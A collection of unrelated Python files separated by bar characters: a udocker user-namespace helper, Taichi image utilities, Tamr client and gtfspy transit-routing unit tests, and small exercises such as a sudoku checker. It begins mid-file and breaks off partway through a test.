assert len(result["txid"]) > 20
|
# -*- coding: utf-8 -*-
"""Basic unshare for udocker maintenance"""
import os
import ctypes
import subprocess
from udocker.msg import Msg
from udocker.helper.hostinfo import HostInfo
from udocker.helper.nixauth import NixAuthentication
class Unshare(object):
"""Place a process in a namespace"""
CLONE_NEWNS = 0x20000
CLONE_NEWUTS = 0x4000000
CLONE_NEWIPC = 0x8000000
CLONE_NEWUSER = 0x10000000
CLONE_NEWPID = 0x20000000
CLONE_NEWNET = 0x40000000
def unshare(self, flags):
"""Python implementation of unshare"""
try:
_unshare = ctypes.CDLL("libc.so.6").unshare
except OSError:
Msg().err("Error: in unshare: mapping libc")
return False
_unshare.restype = ctypes.c_int
_unshare.argtypes = (ctypes.c_int, )
if _unshare(flags) == -1:
Msg().err("Error: in unshare:", os.strerror(-1))
return False
return True
def namespace_exec(self, method, flags=CLONE_NEWUSER):
"""Execute command in namespace"""
(pread1, pwrite1) = os.pipe()
(pread2, pwrite2) = os.pipe()
cpid = os.fork()
if cpid:
os.close(pwrite1)
os.read(pread1, 1) # wait
user = HostInfo().username()
newidmap = ["newuidmap", str(cpid), "0", str(HostInfo.uid), "1"]
for (subid, subcount) in NixAuthentication().user_in_subuid(user):
newidmap.extend(["1", subid, subcount])
subprocess.call(newidmap)
newidmap = ["newgidmap", str(cpid), "0", str(HostInfo.uid), "1"]
for (subid, subcount) in NixAuthentication().user_in_subgid(user):
newidmap.extend(["1", subid, subcount])
subprocess.call(newidmap)
os.close(pwrite2) # notify
(dummy, status) = os.waitpid(cpid, 0)
if status % 256:
Msg().err("Error: namespace exec action failed")
return False
return True
else:
self.unshare(flags)
os.close(pwrite2)
os.close(pwrite1) # notify
os.read(pread2, 1) # wait
try:
os.setgid(0)
os.setuid(0)
os.setgroups([0, 0, ])
except OSError:
Msg().err("Error: setting ids and groups")
return False
# pylint: disable=protected-access
os._exit(int(method()))
return False
|
'''
Amresh
Tripathy '''
import flask
print ('Hello world') |
#Find the average of keys of dictionary
dic={1: 10, 2: 20, 3: 30, 4: 40, 5: 50, 6: 60}
sum=0
count=0
for i in dic.keys():
sum+=i
count+=1
print('Average is',sum/count) |
from io import BytesIO
import numpy as np
from taichi.core import ti_core as _ti_core
import taichi as ti
def cook_image_to_bytes(img):
"""
Takes a NumPy array or Taichi field of any type.
Returns a NumPy array of uint8.
This is used by ti.imwrite and ti.imdisplay.
"""
if not isinstance(img, np.ndarray):
img = img.to_numpy()
if img.dtype in [np.uint16, np.uint32, np.uint64]:
img = (img // (np.iinfo(img.dtype).max // 256)).astype(np.uint8)
elif img.dtype in [np.float32, np.float64]:
img = (np.clip(img, 0, 1) * 255.0 + 0.5).astype(np.uint8)
elif img.dtype != np.uint8:
raise ValueError(f'Data type {img.dtype} not supported in ti.imwrite')
assert len(img.shape) in [2,
3], "Image must be either RGB/RGBA or greyscale"
if len(img.shape) == 2:
img = img.reshape(*img.shape, 1)
assert img.shape[2] in [1, 3,
4], "Image must be either RGB/RGBA or greyscale"
return img.swapaxes(0, 1)[::-1, :]
def imdisplay(img):
"""
Try to display image in interactive shell.
Args:
img (Union[ti.field, np.ndarray]): A field of of array with shape `(width, height)` or `(height, width, 3)` or `(height, width, 4)`.
"""
try:
get_ipython()
except:
ti.imshow(img)
else:
import IPython.display # pylint: disable=C0415
import PIL.Image # pylint: disable=C0415
img = cook_image_to_bytes(img)
with BytesIO() as f:
PIL.Image.fromarray(img).save(f, 'png')
IPython.display.display(IPython.display.Image(data=f.getvalue()))
def imresize(img, w, h=None):
"""Resize an image to a specific size.
Args:
img (Union[ti.field, np.ndarray]): A field of of array with shape `(width, height, ...)`
w (int): The output width after resize.
h (int, optional): The output height after resize, will be the same as width if not set. Default to `None`.
Returns:
np.ndarray: An output image after resize input.
"""
if not isinstance(img, np.ndarray):
img = img.to_numpy()
if h is None:
h = w
if (w, h) == img.shape[:2]:
return img
assert isinstance(w, int) and isinstance(h, int) and w > 1 and h > 1
u, v = (img.shape[0]) / (w), (img.shape[1]) / (h)
x = np.clip(np.arange(w) * u, 0, img.shape[0] - 1).astype(np.int32)
y = np.clip(np.arange(h) * v, 0, img.shape[1] - 1).astype(np.int32)
return img[tuple(np.meshgrid(x, y))].swapaxes(0, 1)
def imwrite(img, filename):
"""Save a field to a a specific file.
Args:
img (Union[ti.field, np.ndarray]): A field of shape `(height, width)` or `(height, width, 3)` or `(height, width, 4)`, \
if dtype is float-type (`ti.f16`, `ti.f32`, `np.float32` etc), **the value of each pixel should be float between \[0.0, 1.0\]**. Otherwise `ti.imwrite` will first clip them into \[0.0, 1.0\]\
if dtype is int-type (`ti.u8`, `ti.u16`, `np.uint8` etc), , **the value of each pixel can be any valid integer in its own bounds**. These integers in this field will be scaled to \[0, 255\] by being divided over the upper bound of its basic type accordingly.
filename (str): The filename to save to.
"""
img = cook_image_to_bytes(img)
img = np.ascontiguousarray(img)
ptr = img.ctypes.data
resy, resx, comp = img.shape
_ti_core.imwrite(filename, ptr, resx, resy, comp)
def imread(filename, channels=0):
"""Load image from a specific file.
Args:
filename (str): An image filename to load from.
channels (int, optinal): The channels hint of input image, Default to 0.
Returns:
np.ndarray : An output image loaded from given filename.
"""
ptr, resx, resy, comp = _ti_core.imread(filename, channels)
img = np.ndarray(shape=(resy, resx, comp), dtype=np.uint8)
img = np.ascontiguousarray(img)
# TODO(archibate): Figure out how np.ndarray constructor works and replace:
_ti_core.C_memcpy(img.ctypes.data, ptr, resx * resy * comp)
# Discussion: https://github.com/taichi-dev/taichi/issues/802
return img.swapaxes(0, 1)[:, ::-1, :]
def imshow(img, window_name='imshow'):
"""Show image in a Taichi GUI.
Args:
img (Union[ti.field, np.ndarray]): A field of of array with shape `(width, height)` or `(height, width, 3)` or `(height, width, 4)`.
window_name (str, optional): The title of GUI window. Default to `imshow`.
"""
if not isinstance(img, np.ndarray):
img = img.to_numpy()
assert len(img.shape) in [2,
3], "Image must be either RGB/RGBA or greyscale"
with ti.GUI(window_name, res=img.shape[:2]) as gui:
img = gui.cook_image(img)
while gui.running:
if gui.get_event(ti.GUI.ESCAPE):
gui.running = False
gui.set_image(img)
gui.show()
|
from functools import partial
import json
import responses
from tamr_unify_client import Client
from tamr_unify_client.auth import UsernamePasswordAuth
project_config = {
"name": "Project 1",
"description": "Mastering Project",
"type": "DEDUP",
"unifiedDatasetName": "Project 1 - Unified Dataset",
"externalId": "Project1",
"resourceId": "1",
}
project_url = "http://localhost:9100/api/versioned/v1/projects/1"
@responses.activate
def test_binning_model_records():
records_body = [
{
"id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bb8"],
"isActive": ["true"],
"clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
"similarityFunction": ["COSINE"],
"tokenizer": ["DEFAULT"],
"fieldName": ["surname"],
"threshold": ["0.75"],
}
]
records_url = (
"http://localhost:9100/api/versioned/v1/projects/1/binningModel/records"
)
responses.add(responses.GET, project_url, json=project_config)
responses.add(
responses.GET,
records_url,
body="\n".join(json.dumps(body) for body in records_body),
)
tamr = Client(UsernamePasswordAuth("username", "password"))
project = tamr.projects.by_resource_id("1").as_mastering()
binning_model = project.binning_model()
binning_model_records = list(binning_model.records())
assert binning_model_records == records_body
@responses.activate
def test_binning_model_update_records():
records_body = [
{
"id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bb8"],
"isActive": ["true"],
"clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
"similarityFunction": ["COSINE"],
"tokenizer": ["DEFAULT"],
"fieldName": ["surname"],
"threshold": ["0.75"],
},
{
"id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bc9"],
"isActive": ["true"],
"clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
"similarityFunction": ["COSINE"],
"tokenizer": ["DEFAULT"],
"fieldName": ["surname"],
"threshold": ["0.75"],
},
{
"id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bd8"],
"isActive": ["true"],
"clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
"similarityFunction": ["COSINE"],
"tokenizer": ["DEFAULT"],
"fieldName": ["surname"],
"threshold": ["0.75"],
},
]
expected_updates = [
{
"action": "CREATE",
"recordId": "d8b7351d-24ce-49aa-8655-5b5809ab6bb8",
"record": {
"id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bb8"],
"isActive": ["true"],
"clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
"similarityFunction": ["COSINE"],
"tokenizer": ["DEFAULT"],
"fieldName": ["surname"],
"threshold": ["0.75"],
},
},
{
"action": "CREATE",
"recordId": "d8b7351d-24ce-49aa-8655-5b5809ab6bc9",
"record": {
"id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bc9"],
"isActive": ["true"],
"clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
"similarityFunction": ["COSINE"],
"tokenizer": ["DEFAULT"],
"fieldName": ["surname"],
"threshold": ["0.75"],
},
},
{
"action": "CREATE",
"recordId": "d8b7351d-24ce-49aa-8655-5b5809ab6bd8",
"record": {
"id": ["d8b7351d-24ce-49aa-8655-5b5809ab6bd8"],
"isActive": ["true"],
"clauseId": ["2e6c5f1b-ed49-40ab-8cbb-350aded25070"],
"similarityFunction": ["COSINE"],
"tokenizer": ["DEFAULT"],
"fieldName": ["surname"],
"threshold": ["0.75"],
},
},
]
snoop_dict = {}
def update_callback(request, snoop):
snoop["payload"] = request.body
return 200, {}, "{}"
update_records_url = (
"http://localhost:9100/api/versioned/v1/projects/1/binningModel/records"
)
responses.add(responses.GET, project_url, json=project_config)
responses.add_callback(
responses.POST,
update_records_url,
callback=partial(update_callback, snoop=snoop_dict),
)
tamr = Client(UsernamePasswordAuth("username", "password"))
project = tamr.projects.by_resource_id("1").as_mastering()
binning_model = project.binning_model()
updates = [
{"action": "CREATE", "recordId": record["id"][0], "record": record}
for record in records_body
]
binning_model.update_records(updates)
actual = [json.loads(item) for item in snoop_dict["payload"]]
assert expected_updates == actual
|
correct = [[1, 2, 3],
[2, 3, 1],
[3, 1, 2]]
incorrect = [[1, 2, 3, 4],
[2, 3, 1, 3],
[3, 1, 2, 3],
[4, 4, 4, 4]]
incorrect2 = [[1, 2, 3, 4],
[2, 3, 1, 4],
[4, 1, 2, 3],
[3, 4, 1, 2]]
incorrect3 = [[1, 2, 3, 4, 5],
[2, 3, 1, 5, 6],
[4, 5, 2, 1, 3],
[3, 4, 5, 2, 1],
[5, 6, 4, 3, 2]]
incorrect4 = [['a', 'b', 'c'],
['b', 'c', 'a'],
['c', 'a', 'b']]
incorrect5 = [[1, 1.5],
[1.5, 1]]
# Define a function check_sudoku() here:
def check_elements(content, matrix):
for row in matrix:
row.sort()
if content != row:
return False
return True
def check_sudoku(square):
dim = len(square[0])
content = [i for i in range(1, dim + 1)]
inverse = [[row[i] for row in square] for i in range(dim)]
rows = check_elements(content, square)
columns = check_elements(content, inverse)
return rows and columns
print(check_sudoku(incorrect))
# >>> False
print(check_sudoku(correct))
# >>> True
print(check_sudoku(incorrect2))
# >>> False
print(check_sudoku(incorrect3))
# >>> False
print(check_sudoku(incorrect4))
# >>> False
print(check_sudoku(incorrect5))
# >>> False
|
from unittest import TestCase
import networkx
from six import StringIO
from gtfspy.routing.connection import Connection
from gtfspy.routing.label import min_arrival_time_target, LabelTimeWithBoardingsCount, LabelTime
from gtfspy.routing.multi_objective_pseudo_connection_scan_profiler import MultiObjectivePseudoCSAProfiler
from gtfspy.routing.node_profile_multiobjective import NodeProfileMultiObjective
import pyximport
pyximport.install()
class TestMultiObjectivePseudoCSAProfiler(TestCase):
# noinspection PyAttributeOutsideInit
def setUp(self):
event_list_raw_data = [
(2, 4, 40, 50, "trip_6", 1),
(1, 3, 32, 40, "trip_5", 1),
(3, 4, 32, 35, "trip_4", 1),
(2, 3, 25, 30, "trip_3", 1),
(1, 2, 10, 20, "trip_2", 1),
(0, 1, 0, 10, "trip_1", 1)
]
self.transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
self.walk_network = networkx.Graph()
self.walk_network.add_edge(1, 2, d_walk=20)
self.walk_network.add_edge(3, 4, d_walk=15)
self.walk_speed = 1
self.target_stop = 4
self.transfer_margin = 0
self.start_time = 0
self.end_time = 50
def test_pseudo_connections(self):
event_list_raw_data = [
(0, 1, 10, 20, "trip_6", 1),
(2, 3, 42, 50, "trip_5", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(1, 2, d_walk=20)
walk_speed = 1
target_stop = 3
transfer_margin = 0
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
self.assertEqual(len(csa_profile._all_connections), 3)
pseudo_connection = csa_profile._all_connections[1]
self.assertTrue(pseudo_connection.is_walk)
self.assertEqual(pseudo_connection.departure_time, 42 - 20)
self.assertEqual(pseudo_connection.arrival_time, 42)
self.assertEqual(pseudo_connection.departure_stop, 1)
self.assertEqual(pseudo_connection.arrival_stop, 2)
node_to_connection_dep_times = {
0: [10],
1: [42 - 20],
2: [42],
3: [],
}
for node, dep_times in node_to_connection_dep_times.items():
profile = csa_profile._stop_profiles[node]
for dep_time in dep_times:
self.assertIn(dep_time, profile.dep_times_to_index, "Node: " + str(node))
for dep_time in profile.dep_times_to_index:
self.assertIn(dep_time, dep_times, "Node: " + str(node))
for connection in csa_profile._all_connections:
arrival_stop_profile = csa_profile._stop_profiles[connection.arrival_stop]
departure_stop_profile = csa_profile._stop_profiles[connection.departure_stop]
self.assertIsInstance(arrival_stop_profile, NodeProfileMultiObjective)
self.assertIsInstance(departure_stop_profile, NodeProfileMultiObjective)
self.assertIn(connection.departure_time, departure_stop_profile.dep_times_to_index)
if connection.arrival_stop_next_departure_time != float('inf'):
self.assertIn(connection.arrival_stop_next_departure_time, arrival_stop_profile.dep_times_to_index)
def test_pseudo_connections_with_transfer_margin(self):
event_list_raw_data = [
(0, 1, 10, 20, "trip_6", 1),
(2, 3, 42, 50, "trip_5", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(1, 2, d_walk=10)
walk_speed = 1
target_stop = 3
transfer_margin = 5
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
transfer_connection = csa_profile._all_connections[1]
self.assertEqual(transfer_connection.arrival_stop, 2)
self.assertEqual(transfer_connection.arrival_stop_next_departure_time, 42)
self.assertEqual(transfer_connection.departure_stop, 1)
self.assertEqual(transfer_connection.departure_time, 42 - 10)
self.assertEqual(transfer_connection.is_walk, True)
self.assertEqual(transfer_connection.arrival_time, 42)
def test_basics(self):
csa_profile = MultiObjectivePseudoCSAProfiler(self.transit_connections, self.target_stop,
self.start_time, self.end_time, self.transfer_margin,
self.walk_network, self.walk_speed)
csa_profile.run()
stop_3_labels = csa_profile.stop_profiles[3].get_final_optimal_labels()
self.assertEqual(len(stop_3_labels), 1)
self.assertIn(LabelTimeWithBoardingsCount(32, 35, n_boardings=1, first_leg_is_walk=False), stop_3_labels)
stop_2_labels = csa_profile.stop_profiles[2].get_final_optimal_labels()
self.assertEqual(len(stop_2_labels), 3)
self.assertIn(LabelTimeWithBoardingsCount(40, 50, n_boardings=1, first_leg_is_walk=False), stop_2_labels)
self.assertIn(LabelTimeWithBoardingsCount(25, 35, n_boardings=2, first_leg_is_walk=False), stop_2_labels)
self.assertIn(LabelTimeWithBoardingsCount(25, 45, n_boardings=1, first_leg_is_walk=False), stop_2_labels)
stop_one_profile = csa_profile.stop_profiles[1]
stop_one_pareto_labels = stop_one_profile.get_final_optimal_labels()
labels = list()
# these should exist at least:
labels.append(LabelTimeWithBoardingsCount(departure_time=10, arrival_time_target=35, n_boardings=3, first_leg_is_walk=False))
labels.append(LabelTimeWithBoardingsCount(departure_time=20, arrival_time_target=50, n_boardings=1, first_leg_is_walk=False))
labels.append(LabelTimeWithBoardingsCount(departure_time=32, arrival_time_target=55, n_boardings=1, first_leg_is_walk=False))
def test_multiple_targets(self):
event_list_raw_data = [
(1, 4, 40, 50, "trip", 1),
(1, 5, 30, 40, "trip", 1),
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_speed = 1
source_stop = 1
targets = [4, 5]
transfer_margin = 0
start_time = 0
end_time = 60
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, targets,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
source_stop_profile = csa_profile.stop_profiles[source_stop]
final_labels = source_stop_profile.get_final_optimal_labels()
self.assertEqual(2, len(final_labels))
def test_simple(self):
event_list_raw_data = [
(2, 4, 40, 50, "trip_5", 1),
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(1, 2, d_walk=20)
walk_network.add_edge(3, 4, d_walk=15)
walk_speed = 1
source_stop = 1
target_stop = 4
transfer_margin = 0
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
source_stop_profile = csa_profile.stop_profiles[source_stop]
self.assertTrue(source_stop_profile._finalized)
self.assertTrue(source_stop_profile._closed)
source_stop_labels = source_stop_profile.get_final_optimal_labels()
labels = list()
labels.append(LabelTimeWithBoardingsCount(departure_time=20,
arrival_time_target=50,
n_boardings=1,
first_leg_is_walk=True))
self._assert_label_sets_equal(
labels,
source_stop_labels
)
def test_last_leg_is_walk(self):
event_list_raw_data = [
(0, 1, 0, 10, "trip_1", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(1, 2, d_walk=20)
walk_speed = 1
source_stop = 0
target_stop = 2
transfer_margin = 0
start_time = 0
end_time = 50
labels = list()
labels.append(LabelTimeWithBoardingsCount(departure_time=0, arrival_time_target=30, n_boardings=1, first_leg_is_walk=False))
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
found_tuples = csa_profile.stop_profiles[source_stop].get_final_optimal_labels()
self._assert_label_sets_equal(found_tuples, labels)
def test_walk_is_faster_than_by_trip(self):
event_list_raw_data = [
(0, 1, 0, 10, "trip_1", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_speed = 0.5
source_stop = 0
target_stop = 1
transfer_margin = 0
start_time = 0
end_time = 50
walk_network = networkx.Graph()
walk_network.add_edge(0, 1, d_walk=1)
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
source_profile = csa_profile.stop_profiles[source_stop]
self.assertEqual(min_arrival_time_target(source_profile.evaluate(0, first_leg_can_be_walk=True)), 2)
found_tuples = source_profile.get_final_optimal_labels()
self.assertEqual(len(found_tuples), 0)
def test_no_multiple_walks(self):
event_list_raw_data = [
(0, 1, 0, 1, "trip_1", 1),
(1, 0, 0, 1, "trip_2", 1),
(0, 1, 2, 3, "trip_3", 1),
(1, 0, 2, 3, "trip_4", 1),
(0, 1, 4, 5, "trip_5", 1),
(1, 0, 4, 5, "trip_6", 1),
(1, 2, 5, 6, "trip_7", 1),
(2, 1, 5, 6, "trip_8", 1),
(1, 2, 2, 3, "trip_7", 2),
(2, 1, 2, 3, "trip_8", 2)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(0, 1, d_walk=1)
walk_network.add_edge(2, 1, d_walk=1)
walk_speed = 10
transfer_margin = 0
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, 2,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
source_profile = csa_profile.stop_profiles[0]
print(source_profile.get_final_optimal_labels())
for label in source_profile.get_final_optimal_labels():
self.assertGreater(label.n_boardings, 0)
def test_target_node_not_in_walk_network(self):
event_list_raw_data = [
(0, 1, 0, 10, "trip_1", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_speed = 2
source_stop = 0
target_stop = 1
transfer_margin = 0
start_time = 0
end_time = 50
walk_network = networkx.Graph()
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
source_profile = csa_profile.stop_profiles[source_stop]
self.assertEqual(min_arrival_time_target(source_profile.evaluate(0, 0)), 10)
found_tuples = source_profile.get_final_optimal_labels()
self.assertEqual(len(found_tuples), 1)
def test_pareto_optimality(self):
event_list_raw_data = [
(0, 2, 0, 10, "trip_1", 1),
(0, 1, 2, 5, "trip_2", 1),
(1, 2, 5, 8, "trip_3", 1)
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_speed = 2
source_stop = 0
target_stop = 2
transfer_margin = 0
start_time = 0
end_time = 20
walk_network = networkx.Graph()
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
source_profile = csa_profile.stop_profiles[source_stop]
self.assertEqual(min_arrival_time_target(source_profile.evaluate(0, 0)), 8)
found_labels = source_profile.get_final_optimal_labels()
labels_should_be = list()
labels_should_be.append(LabelTimeWithBoardingsCount(0, 10, n_boardings=1, first_leg_is_walk=False))
labels_should_be.append(LabelTimeWithBoardingsCount(2, 8, n_boardings=2, first_leg_is_walk=False))
self._assert_label_sets_equal(found_labels, labels_should_be)
def test_transfer_margin(self):
walk_speed = 1
target_stop = 2
start_time = 0
end_time = 60
transit_connections = [
Connection(0, 1, 40, 50, "trip_1", 1),
Connection(1, 2, 50, 60, "trip_1", 2),
Connection(3, 1, 40, 50, "trip_2", 1),
]
# case without any transfer margin
transfer_margin = 0
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
networkx.Graph(), walk_speed)
csa_profile.run()
stop_profile_1 = csa_profile.stop_profiles[1]
stop_profile_3 = csa_profile.stop_profiles[3]
self.assertEqual(1, len(stop_profile_1.get_final_optimal_labels()))
self.assertEqual(1, len(stop_profile_3.get_final_optimal_labels()))
# case with transfer margin
transfer_margin = 1
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
networkx.Graph(), walk_speed)
csa_profile.run()
stop_profile_3 = csa_profile.stop_profiles[3]
stop_profile_1 = csa_profile.stop_profiles[1]
self.assertEqual(0, len(stop_profile_3.get_final_optimal_labels()))
self.assertEqual(1, len(stop_profile_1.get_final_optimal_labels()))
def test_possible_transfer_margin_bug_with_multiple_arrivals(self):
walk_speed = 1
target_stop = 3
start_time = 0
end_time = 200
transfer_margin = 2
transit_connections = [
Connection(0, 1, 100, 101, "trip_0", 1),
Connection(4, 1, 102, 104, "trip_1", 1),
Connection(2, 3, 106, 108, "trip_2", 1)
]
walk_network = networkx.Graph()
walk_network.add_edge(1, 2, d_walk=1)
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
profile = csa_profile.stop_profiles[4]
self.assertEqual(len(profile.get_final_optimal_labels()), 0)
profile = csa_profile.stop_profiles[0]
self.assertEqual(len(profile.get_final_optimal_labels()), 1)
def test_transfer_margin_with_walk(self):
walk_speed = 1
target_stop = 3
start_time = 0
end_time = 2000
transit_connections = [
Connection(0, 1, 1000, 1010, "trip__2", 1),
Connection(0, 1, 1010, 1020, "trip__1", 1),
Connection(0, 1, 1020, 1030, "trip_0", 1),
Connection(0, 1, 1000, 1010, "trip_1", 1),
Connection(0, 1, 1010, 1020, "trip_2", 1),
Connection(0, 1, 1020, 1030, "trip_3", 1),
Connection(0, 1, 1030, 1040, "trip_4", 1),
Connection(2, 3, 1060, 1070, "trip_6", 1),
]
walk_network = networkx.Graph()
walk_network.add_edge(1, 2, d_walk=5)
transfer_margins = [10, 20, 30, 40, 0]
journey_dep_times = [1030, 1020, 1010, 1000, 1030]
for transfer_margin, dep_time in zip(transfer_margins, journey_dep_times):
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed)
csa_profile.run()
profile = csa_profile.stop_profiles[0]
self.assertEqual(len(profile.get_final_optimal_labels()), 1, "transfer_margin=" + str(transfer_margin))
label = profile.get_final_optimal_labels()[0]
self.assertEqual(label.departure_time, dep_time, "transfer_margin=" + str(transfer_margin))
def test_basics_no_transfer_tracking(self):
csa_profile = MultiObjectivePseudoCSAProfiler(
self.transit_connections, self.target_stop,
self.start_time, self.end_time, self.transfer_margin,
self.walk_network, self.walk_speed, track_vehicle_legs=False
)
csa_profile.run()
stop_3_pareto_tuples = csa_profile.stop_profiles[3].get_final_optimal_labels()
self.assertEqual(len(stop_3_pareto_tuples), 1)
self.assertIn(LabelTime(32., 35.), stop_3_pareto_tuples)
stop_2_pareto_tuples = csa_profile.stop_profiles[2].get_final_optimal_labels()
self.assertEqual(len(stop_2_pareto_tuples), 2)
self.assertIn(LabelTime(40., 50.), stop_2_pareto_tuples)
self.assertIn(LabelTime(25., 35.), stop_2_pareto_tuples)
source_stop_profile = csa_profile.stop_profiles[1]
source_stop_pareto_optimal_tuples = source_stop_profile.get_final_optimal_labels()
pareto_tuples = list()
pareto_tuples.append(LabelTime(departure_time=10, arrival_time_target=35))
pareto_tuples.append(LabelTime(departure_time=20, arrival_time_target=50))
pareto_tuples.append(LabelTime(departure_time=32, arrival_time_target=55))
self._assert_label_sets_equal(
pareto_tuples,
source_stop_pareto_optimal_tuples
)
def test_transfers_only(self):
event_list_raw_data = [
(7, 2, 20, 30, "trip_6", 1),
(2, 4, 40, 50, "trip_5", 1),
]
transit_connections = list(map(lambda el: Connection(*el), event_list_raw_data))
walk_network = networkx.Graph()
walk_network.add_edge(1, 2, d_walk=20)
walk_network.add_edge(3, 4, d_walk=15)
walk_speed = 1
target_stop = 4
transfer_margin = 0
start_time = 0
end_time = 50
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
walk_network, walk_speed, track_time=False)
csa_profile.run()
stop_to_n_boardings = {
2: 1,
7: 2,
3: 0
}
for stop, n_veh_legs in stop_to_n_boardings.items():
labels = csa_profile.stop_profiles[stop].get_final_optimal_labels()
self.assertEqual(len(labels), 1)
self.assertEqual(labels[0].n_boardings, n_veh_legs)
def test_reset(self):
walk_speed = 1
target_stop = 2
start_time = 0
end_time = 60
transfer_margin = 0
transit_connections = [
Connection(0, 1, 40, 50, "trip_1", 1),
Connection(1, 2, 55, 60, "trip_1", 1),
Connection(3, 1, 40, 60, "trip_2", 1)
]
csa_profile = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
networkx.Graph(), walk_speed)
csa_profile.run()
nodes = [0, 1, 2, 3]
label_counts = [1, 1, 0, 0]
for node, count in zip(nodes, label_counts):
n_labels = len(csa_profile.stop_profiles[node].get_final_optimal_labels())
self.assertEqual(n_labels, count)
target_stops = [1]
csa_profile.reset(target_stops)
csa_profile.run()
label_counts = [1, 0, 0, 1]
for node, count in zip(nodes, label_counts):
n_labels = len(csa_profile.stop_profiles[node].get_final_optimal_labels())
self.assertEqual(n_labels, count)
# TODO: perform a check for the reinitialization of trip_labels
# THIS IS NOT YET TESTED but should work at the moment
# RK 9.1.2017
def test_550_problem(self):
# There used to be a problem when working with real unixtimes (c-side floating point number problems),
# this test is one check for that
event_data = StringIO(
"from_stop_I,to_stop_I,dep_time_ut,arr_time_ut,route_type,route_id,trip_I,seq\n" +
"2198,2247,1475530740,1475530860,3,2550,158249,36\n" +
"2247,2177,1475530860,1475530980,3,2550,158249,37\n")
import pandas as pd
events = pd.read_csv(event_data)
events.sort_values("dep_time_ut", ascending=False, inplace=True)
connections = [
Connection(int(e.from_stop_I), int(e.to_stop_I), int(e.dep_time_ut), int(e.arr_time_ut),
int(e.trip_I),
int(e.seq))
for e in events.itertuples()
]
csa_profiler = MultiObjectivePseudoCSAProfiler(connections, 2177,
0, 1475530860*10, 0,
networkx.Graph(), 0)
csa_profiler.run()
profiles = csa_profiler.stop_profiles
labels_2198 = profiles[2198].get_final_optimal_labels()
self.assertEqual(len(labels_2198), 1)
self.assertEqual(labels_2198[0].duration(), 1475530980 - 1475530740)
labels_2247 = profiles[2247].get_final_optimal_labels()
self.assertEqual(len(labels_2247), 1)
self.assertEqual(labels_2247[0].duration(), 1475530980 - 1475530860)
def test_transfer_on_same_stop_with_multiple_departures(self):
walk_speed = 1000
target_stop = 5
start_time = 0
end_time = 60
transfer_margin = 0
transit_connections = [
Connection(0, 4, 30, 40, "trip_1", 1),
Connection(4, 1, 50, 60, "trip_2", 1),
Connection(4, 2, 50, 60, "trip_3", 1),
Connection(4, 3, 50, 60, "trip_4", 1),
Connection(4, target_stop, 70, 100, "trip_5", 1)
]
csa_profiler = MultiObjectivePseudoCSAProfiler(transit_connections, target_stop,
start_time, end_time, transfer_margin,
networkx.Graph(), walk_speed)
csa_profiler.run()
profiles = csa_profiler.stop_profiles
assert(profiles[0].get_final_optimal_labels()[0])
assert(len(profiles[0].get_final_optimal_labels()) > 0)
def test_transfer_connections_do_not_affect_transfers(self):
walk_speed = 1000
target_stop = 1233412
start_time = 0
end_time = 60
transfer_margin = 0
transit_connections = [
